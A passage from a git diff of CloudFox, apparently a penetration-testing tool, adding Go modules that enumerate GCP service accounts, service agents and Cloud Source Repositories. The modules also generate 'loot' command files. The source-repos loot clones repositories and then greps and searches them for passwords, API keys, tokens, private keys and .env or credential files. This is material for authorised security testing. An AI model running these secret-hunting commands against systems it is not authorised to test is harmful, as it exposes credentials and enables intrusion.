*ServiceAccountsModule) getTableHeader() []string { + return []string{ + // Identity + "Project", + "Email", + "Display Name", + "Disabled", + "Default SA", + // Keys + "User Managed Keys", + "Google Managed Keys", + "Oldest Key Age", + // Permissions + "DWD", + "Roles", + "SA Attack Paths", + // Impersonation + "IAM Binding Role", + "IAM Binding Principal", + } +} + +// serviceAccountsToTableBody converts service accounts to table body rows +func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []ServiceAccountAnalysis) [][]string { + var body [][]string + for _, sa := range serviceAccounts { + disabled := "No" + if sa.Disabled { + disabled = "Yes" + } + + defaultSA := "No" + if sa.IsDefaultSA { + defaultSA = sa.DefaultSAType + } + + // Check if DWD is enabled + dwd := "No" + if sa.OAuth2ClientID != "" { + dwd = "Yes" + } + + // Check attack paths (privesc/exfil/lateral) for this service account + // FoxMapper takes priority if available (graph-based analysis) + attackPaths := gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa.Email) + + // Count keys by type and find oldest key age + userKeyCount := 0 + googleKeyCount := 0 + for _, key := range sa.Keys { + if key.KeyType == "USER_MANAGED" { + userKeyCount++ + } else if key.KeyType == "SYSTEM_MANAGED" { + googleKeyCount++ + } + } + userKeys := "-" + if userKeyCount > 0 { + userKeys = fmt.Sprintf("%d", userKeyCount) + } + googleKeys := "-" + if googleKeyCount > 0 { + googleKeys = fmt.Sprintf("%d", googleKeyCount) + } + + // Format oldest key age + oldestKeyAge := "-" + if sa.OldestKeyAge > 0 { + if sa.OldestKeyAge > 365 { + oldestKeyAge = fmt.Sprintf("%dy %dd", sa.OldestKeyAge/365, sa.OldestKeyAge%365) + } else { + oldestKeyAge = fmt.Sprintf("%dd", sa.OldestKeyAge) + } + // Add warning indicator for old keys + if sa.OldestKeyAge > 90 { + oldestKeyAge += " ⚠" + } + } + + // Format roles for display + rolesDisplay := IAMService.FormatRolesShort(sa.Roles) + + // Build IAM bindings from impersonation info + // Row order: Identity (Project, Email, Display Name, Disabled, Default SA), + // Keys (User Managed Keys, Google Managed Keys, Oldest Key Age), + // Permissions (DWD, Roles, SA Attack Paths), + // Impersonation (IAM Binding Role, IAM Binding Principal) + hasBindings := false + if sa.ImpersonationInfo != nil { + for _, member := range sa.ImpersonationInfo.TokenCreators { + email := extractEmailFromMember(member) + if email != sa.Email { + hasBindings = true + body = append(body, []string{ + m.GetProjectName(sa.ProjectID), sa.Email, sa.DisplayName, disabled, defaultSA, + userKeys, googleKeys, oldestKeyAge, + dwd, rolesDisplay, attackPaths, + "TokenCreator", member, + }) + } + } + for _, member := range sa.ImpersonationInfo.KeyCreators { + email := extractEmailFromMember(member) + if email != sa.Email { + hasBindings = true + body = append(body, []string{ + m.GetProjectName(sa.ProjectID), sa.Email, sa.DisplayName, disabled, defaultSA, + userKeys, googleKeys, oldestKeyAge, + dwd, rolesDisplay, attackPaths, + "KeyAdmin", member, + }) + } + } + for _, member := range sa.ImpersonationInfo.ActAsUsers { + email := extractEmailFromMember(member) + if email != sa.Email { + hasBindings = true + body = append(body, []string{ + m.GetProjectName(sa.ProjectID), sa.Email, sa.DisplayName, disabled, defaultSA, + userKeys, googleKeys, oldestKeyAge, + dwd, rolesDisplay, attackPaths, + "ActAs", member, + }) + } + } + for _, member := range sa.ImpersonationInfo.SAAdmins { + email := extractEmailFromMember(member) + if email != sa.Email { + hasBindings = true + body = append(body, []string{ + m.GetProjectName(sa.ProjectID), sa.Email, sa.DisplayName, disabled, defaultSA, + userKeys, googleKeys, oldestKeyAge, + dwd, rolesDisplay, attackPaths, + "SAAdmin", member, + }) + } + } + for _, member := range sa.ImpersonationInfo.SignBlobUsers { + email := extractEmailFromMember(member) + if email != sa.Email { + hasBindings = true + body = append(body, []string{ + m.GetProjectName(sa.ProjectID), sa.Email, sa.DisplayName, disabled, defaultSA, + userKeys, googleKeys, oldestKeyAge, + dwd, rolesDisplay, attackPaths, + "SignBlob", member, + }) + } + } + for _, member := range sa.ImpersonationInfo.SignJwtUsers { + email := extractEmailFromMember(member) + if email != sa.Email { + hasBindings = true + body = append(body, []string{ + m.GetProjectName(sa.ProjectID), sa.Email, sa.DisplayName, disabled, defaultSA, + userKeys, googleKeys, oldestKeyAge, + dwd, rolesDisplay, attackPaths, + "SignJwt", member, + }) + } + } + } + + if !hasBindings { + body = append(body, []string{ + m.GetProjectName(sa.ProjectID), sa.Email, sa.DisplayName, disabled, defaultSA, + userKeys, googleKeys, oldestKeyAge, + dwd, rolesDisplay, attackPaths, + "-", "-", + }) + } + } + return body +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *ServiceAccountsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, sas := range m.ProjectServiceAccounts { + body := m.serviceAccountsToTableBody(sas) + tableFiles := []internal.TableFile{{ + Name: "serviceaccounts", + Header: m.getTableHeader(), + Body: body, + }} + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = ServiceAccountsOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *ServiceAccountsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allSAs := m.getAllServiceAccounts() + body := m.serviceAccountsToTableBody(allSAs) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{{ + Name: "serviceaccounts", + Header: m.getTableHeader(), + Body: body, + }} + + output := ServiceAccountsOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// extractEmailFromMember extracts the email/identity from an IAM member string +// e.g., "user:alice@example.com" -> "alice@example.com" +// e.g., "serviceAccount:sa@project.iam.gserviceaccount.com" -> "sa@project.iam..." +func extractEmailFromMember(member string) string { + if idx := strings.Index(member, ":"); idx != -1 { + return member[idx+1:] + } + return member +} diff --git a/gcp/commands/serviceagents.go b/gcp/commands/serviceagents.go new file mode 100644 index 00000000..b7b4788e --- /dev/null +++ b/gcp/commands/serviceagents.go @@ -0,0 +1,402 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + serviceagentsservice "github.com/BishopFox/cloudfox/gcp/services/serviceAgentsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPServiceAgentsCommand = &cobra.Command{ + Use: globals.GCP_SERVICEAGENTS_MODULE_NAME, + Aliases: []string{"agents", "service-accounts-google", "gcp-agents"}, + Short: "Enumerate Google-managed service agents", + Long: `Enumerate Google-managed service agents and their permissions. + +Service agents are Google-managed service accounts that operate on behalf +of GCP services. Understanding them helps identify: +- Hidden access paths to resources +- Cross-project service agent access +- Overprivileged service agents +- Potential lateral movement via service agent impersonation + +Common Service Agents: +- Cloud Build Service Account (@cloudbuild.gserviceaccount.com) +- Compute Engine Service Agent (@compute-system.iam.gserviceaccount.com) +- GKE Service Agent (@container-engine-robot.iam.gserviceaccount.com) +- Cloud Run/Functions (@serverless-robot-prod.iam.gserviceaccount.com) +- Cloud SQL Service Agent (@gcp-sa-cloud-sql.iam.gserviceaccount.com) + +Security Considerations: +- Service agents often have broad permissions +- Cross-project agents indicate shared service access +- Cloud Build SA is a common privilege escalation vector +- Default compute SA often has Editor role + +TIP: Run foxmapper first to populate the Attack Paths column with privesc/exfil/lateral movement analysis.`, + Run: runGCPServiceAgentsCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type ServiceAgentsModule struct { + gcpinternal.BaseGCPModule + + ProjectAgents map[string][]serviceagentsservice.ServiceAgentInfo // projectID -> agents + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // Cached FoxMapper analysis results + OrgCache *gcpinternal.OrgCache + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type ServiceAgentsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ServiceAgentsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ServiceAgentsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPServiceAgentsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SERVICEAGENTS_MODULE_NAME) + if err != nil { + return + } + + module := &ServiceAgentsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectAgents: make(map[string][]serviceagentsservice.ServiceAgentInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ServiceAgentsModule) Execute(ctx context.Context, logger internal.Logger) { + // Get FoxMapper cache from context + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + + // Get OrgCache for project number resolution + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SERVICEAGENTS_MODULE_NAME, m.processProject) + + allAgents := m.getAllAgents() + if len(allAgents) == 0 { + logger.InfoM("No service agents found", globals.GCP_SERVICEAGENTS_MODULE_NAME) + return + } + + // Count cross-project agents + crossProjectCount := 0 + for _, agent := range allAgents { + if agent.IsCrossProject { + crossProjectCount++ + } + } + + if crossProjectCount > 0 { + logger.SuccessM(fmt.Sprintf("Found %d service agent(s) (%d cross-project)", len(allAgents), crossProjectCount), globals.GCP_SERVICEAGENTS_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d service agent(s)", len(allAgents)), globals.GCP_SERVICEAGENTS_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// getAllAgents returns all agents from all projects (for statistics) +func (m *ServiceAgentsModule) getAllAgents() []serviceagentsservice.ServiceAgentInfo { + var all []serviceagentsservice.ServiceAgentInfo + for _, agents := range m.ProjectAgents { + all = append(all, agents...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *ServiceAgentsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating service agents in project: %s", projectID), globals.GCP_SERVICEAGENTS_MODULE_NAME) + } + + svc := serviceagentsservice.New() + agents, err := svc.GetServiceAgents(projectID, m.OrgCache) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SERVICEAGENTS_MODULE_NAME, + fmt.Sprintf("Could not get service agents in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectAgents[projectID] = agents + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["serviceagents-commands"] = &internal.LootFile{ + Name: "serviceagents-commands", + Contents: "# Service Agents Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, agent := range agents { + m.addAgentToLoot(projectID, agent) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d service agent(s) in project %s", len(agents), projectID), globals.GCP_SERVICEAGENTS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *ServiceAgentsModule) addAgentToLoot(projectID string, agent serviceagentsservice.ServiceAgentInfo) { + lootFile := m.LootMap[projectID]["serviceagents-commands"] + if lootFile == nil { + return + } + + crossProjectNote := "" + if agent.IsCrossProject { + crossProjectNote = " [CROSS-PROJECT from " + agent.SourceProject + "]" + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# SERVICE AGENT: %s%s\n"+ + "# =============================================================================\n"+ + "# Email: %s\n"+ + "# Description: %s\n", + agent.ServiceName, crossProjectNote, + agent.Email, agent.Description, + ) + + if agent.IsCrossProject && agent.SourceProject != "" { + lootFile.Contents += fmt.Sprintf("# Source Project: %s\n", agent.SourceProject) + } + + if len(agent.Roles) > 0 { + lootFile.Contents += fmt.Sprintf("# Roles: %s\n", strings.Join(agent.Roles, ", ")) + } + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# List all roles granted to this service agent (clean output for screenshots) +gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains("%s")) | .role' + +# Show service agent with its roles (formatted for reporting) +gcloud projects get-iam-policy %s --format=json | jq '[.bindings[] | select(.members[] | contains("%s")) | {role: .role, member: "%s"}]' + +# Check what resources this service agent can access (with roles) +gcloud asset search-all-iam-policies --scope=projects/%s --query='policy:%s' --format=json | jq -r '.results[] | {resource: .resource, roles: [.policy.bindings[].role]} | "\(.resource): \(.roles | join(", "))"' + +# Check resource-level IAM bindings for this service agent +gcloud asset search-all-iam-policies --scope=projects/%s --query='policy.bindings.members:%s' --format=json | jq -r '.results[] | "\(.resource): \([.policy.bindings[] | select(.members[] | contains("%s")) | .role] | join(", "))"' + +`, projectID, agent.Email, projectID, agent.Email, agent.Email, projectID, agent.Email, projectID, agent.Email, agent.Email) + + lootFile.Contents += "\n" +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ServiceAgentsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getHeader returns the table header +func (m *ServiceAgentsModule) getHeader() []string { + return []string{ + "Project", + "Service", + "Email", + "Source Project", + "Cross-Project", + "Role", + "Attack Paths", + "Description", + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *ServiceAgentsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + header := m.getHeader() + + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Build project-level outputs + for projectID, agents := range m.ProjectAgents { + body := m.agentsToTableBody(agents) + tables := []internal.TableFile{{ + Name: globals.GCP_SERVICEAGENTS_MODULE_NAME, + Header: header, + Body: body, + }} + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = ServiceAgentsOutput{Table: tables, Loot: lootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_SERVICEAGENTS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *ServiceAgentsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + header := m.getHeader() + + allAgents := m.getAllAgents() + body := m.agentsToTableBody(allAgents) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{ + { + Name: globals.GCP_SERVICEAGENTS_MODULE_NAME, + Header: header, + Body: body, + }, + } + + output := ServiceAgentsOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SERVICEAGENTS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// agentsToTableBody converts agents to table rows +func (m *ServiceAgentsModule) agentsToTableBody(agents []serviceagentsservice.ServiceAgentInfo) [][]string { + var body [][]string + for _, agent := range agents { + crossProject := "No" + if agent.IsCrossProject { + crossProject = "Yes" + } + + // Source project (where the agent originates from) + sourceProject := "-" + if agent.SourceProject != "" { + sourceProject = agent.SourceProject + } + + // Check attack paths for this service agent + attackPaths := "run foxmapper" + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, agent.Email) + } + + // One row per role + if len(agent.Roles) > 0 { + for _, role := range agent.Roles { + body = append(body, []string{ + m.GetProjectName(agent.ProjectID), + agent.ServiceName, + agent.Email, + sourceProject, + crossProject, + role, + attackPaths, + agent.Description, + }) + } + } else { + // Agent with no roles + body = append(body, []string{ + m.GetProjectName(agent.ProjectID), + agent.ServiceName, + agent.Email, + sourceProject, + crossProject, + "-", + attackPaths, + agent.Description, + }) + } + } + return body +} diff --git a/gcp/commands/sourcerepos.go b/gcp/commands/sourcerepos.go new file mode 100644 index 00000000..4e7f74d5 --- /dev/null +++ b/gcp/commands/sourcerepos.go @@ -0,0 +1,388 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + sourcereposservice "github.com/BishopFox/cloudfox/gcp/services/sourceReposService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPSourceReposCommand = &cobra.Command{ + Use: globals.GCP_SOURCEREPOS_MODULE_NAME, + Aliases: []string{"repos", "csr", "git"}, + Short: "Enumerate Cloud Source Repositories", + Long: `Enumerate Cloud Source Repositories for code and secrets. + +Cloud Source Repositories can contain: +- Application source code +- Infrastructure as Code (Terraform, CloudFormation) +- Configuration files with hardcoded credentials +- API keys and secrets in code +- CI/CD pipeline configurations + +Output: +- List of all repositories accessible +- Repository sizes and mirror configurations +- Clone commands for each repository +- Secret search commands + +After cloning, search for: +- Hardcoded credentials and API keys +- Private keys and certificates +- Environment configuration files +- Database connection strings`, + Run: runGCPSourceReposCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type SourceReposModule struct { + gcpinternal.BaseGCPModule + + ProjectRepos map[string][]sourcereposservice.RepoInfo // projectID -> repos + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type SourceReposOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o SourceReposOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SourceReposOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPSourceReposCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SOURCEREPOS_MODULE_NAME) + if err != nil { + return + } + + module := &SourceReposModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectRepos: make(map[string][]sourcereposservice.RepoInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *SourceReposModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SOURCEREPOS_MODULE_NAME, m.processProject) + + allRepos := m.getAllRepos() + if len(allRepos) == 0 { + logger.InfoM("No Cloud Source Repositories found", globals.GCP_SOURCEREPOS_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d repository(ies)", len(allRepos)), globals.GCP_SOURCEREPOS_MODULE_NAME) + logger.InfoM("[PENTEST] Clone repositories and search for secrets!", globals.GCP_SOURCEREPOS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// getAllRepos returns all repos from all projects (for statistics) +func (m *SourceReposModule) getAllRepos() []sourcereposservice.RepoInfo { + var all []sourcereposservice.RepoInfo + for _, repos := range m.ProjectRepos { + all = append(all, repos...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *SourceReposModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Cloud Source Repositories in project: %s", projectID), globals.GCP_SOURCEREPOS_MODULE_NAME) + } + + svc := sourcereposservice.New() + repos, err := svc.ListRepos(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SOURCEREPOS_MODULE_NAME, + fmt.Sprintf("Could not list repos in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectRepos[projectID] = repos + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["sourcerepos-commands"] = &internal.LootFile{ + Name: "sourcerepos-commands", + Contents: "# Cloud Source Repository Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, repo := range repos { + m.addRepoToLoot(projectID, repo) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d repository(ies) in project %s", len(repos), projectID), globals.GCP_SOURCEREPOS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *SourceReposModule) addRepoToLoot(projectID string, repo sourcereposservice.RepoInfo) { + lootFile := m.LootMap[projectID]["sourcerepos-commands"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# REPOSITORY: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n", + repo.Name, repo.ProjectID, + ) + + if repo.Size > 0 { + lootFile.Contents += fmt.Sprintf("# Size: %d bytes\n", repo.Size) + } + if repo.MirrorConfig { + lootFile.Contents += fmt.Sprintf("# Mirrors: %s\n", repo.MirrorURL) + } + if repo.PubsubConfigs > 0 { + lootFile.Contents += fmt.Sprintf("# Pub/Sub Triggers: %d\n", repo.PubsubConfigs) + } + + // IAM bindings summary + if len(repo.IAMBindings) > 0 { + lootFile.Contents += "# IAM Bindings:\n" + for _, binding := range repo.IAMBindings { + lootFile.Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + lootFile.Contents += fmt.Sprintf( + "\n# Clone repository:\n"+ + "gcloud source repos clone %s --project=%s\n\n"+ + "# Get IAM policy:\n"+ + "gcloud source repos get-iam-policy %s --project=%s\n\n"+ + "# Search for secrets after cloning:\n"+ + "cd %s && grep -rE '(password|secret|api[_-]?key|private[_-]?key|AWS_|GOOGLE_|token)' . --include='*'\n"+ + "find . -name '*.pem' -o -name '*.key' -o -name '.env*' -o -name '*credential*' -o -name '*.tfvars'\n"+ + "grep -rE 'BEGIN (RSA |DSA |EC |OPENSSH )?PRIVATE KEY' .\n\n", + repo.Name, repo.ProjectID, + repo.Name, repo.ProjectID, + repo.Name, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *SourceReposModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *SourceReposModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Project", + "Name", + "Size", + "Mirror", + "Mirror URL", + "Triggers", + "IAM Binding Role", + "IAM Binding Principal", + } + + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Build project-level outputs + for projectID, repos := range m.ProjectRepos { + body := m.reposToTableBody(repos) + tables := []internal.TableFile{{ + Name: "source-repos", + Header: header, + Body: body, + }} + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = SourceReposOutput{Table: tables, Loot: lootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_SOURCEREPOS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *SourceReposModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Project", + "Name", + "Size", + "Mirror", + "Mirror URL", + "Triggers", + "IAM Binding Role", + "IAM Binding Principal", + } + + allRepos := m.getAllRepos() + body := m.reposToTableBody(allRepos) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{ + { + Name: "source-repos", + Header: header, + Body: body, + }, + } + + output := SourceReposOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SOURCEREPOS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// reposToTableBody converts repos to table rows +func (m *SourceReposModule) reposToTableBody(repos []sourcereposservice.RepoInfo) [][]string { + var body [][]string + for _, repo := range repos { + sizeDisplay := "-" + if repo.Size > 0 { + if repo.Size > 1024*1024 { + sizeDisplay = fmt.Sprintf("%.1f MB", float64(repo.Size)/(1024*1024)) + } else if repo.Size > 1024 { + sizeDisplay = fmt.Sprintf("%.1f KB", float64(repo.Size)/1024) + } else { + sizeDisplay = fmt.Sprintf("%d B", repo.Size) + } + } + + mirror := "No" + mirrorURL := "-" + if repo.MirrorConfig { + mirror = "Yes" + mirrorURL = repo.MirrorURL + } + + triggers := "-" + if repo.PubsubConfigs > 0 { + triggers = fmt.Sprintf("%d", repo.PubsubConfigs) + } + + // One row per IAM binding + if len(repo.IAMBindings) > 0 { + for _, binding := range repo.IAMBindings { + body = append(body, []string{ + m.GetProjectName(repo.ProjectID), + repo.Name, + sizeDisplay, + mirror, + mirrorURL, + triggers, + binding.Role, + binding.Member, + }) + } + } else { + // Repo with no IAM bindings + body = append(body, []string{ + m.GetProjectName(repo.ProjectID), + repo.Name, + sizeDisplay, + mirror, + mirrorURL, + triggers, + "-", + "-", + }) + } + } + return body +} diff --git a/gcp/commands/spanner.go b/gcp/commands/spanner.go new file mode 100644 index 00000000..79e9f1c0 --- /dev/null +++ b/gcp/commands/spanner.go @@ -0,0 +1,464 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + spannerservice "github.com/BishopFox/cloudfox/gcp/services/spannerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPSpannerCommand = &cobra.Command{ + Use: globals.GCP_SPANNER_MODULE_NAME, + Aliases: []string{"cloud-spanner"}, + Short: "Enumerate Cloud Spanner instances and databases", + Long: `Enumerate Cloud Spanner instances and databases with IAM bindings. + 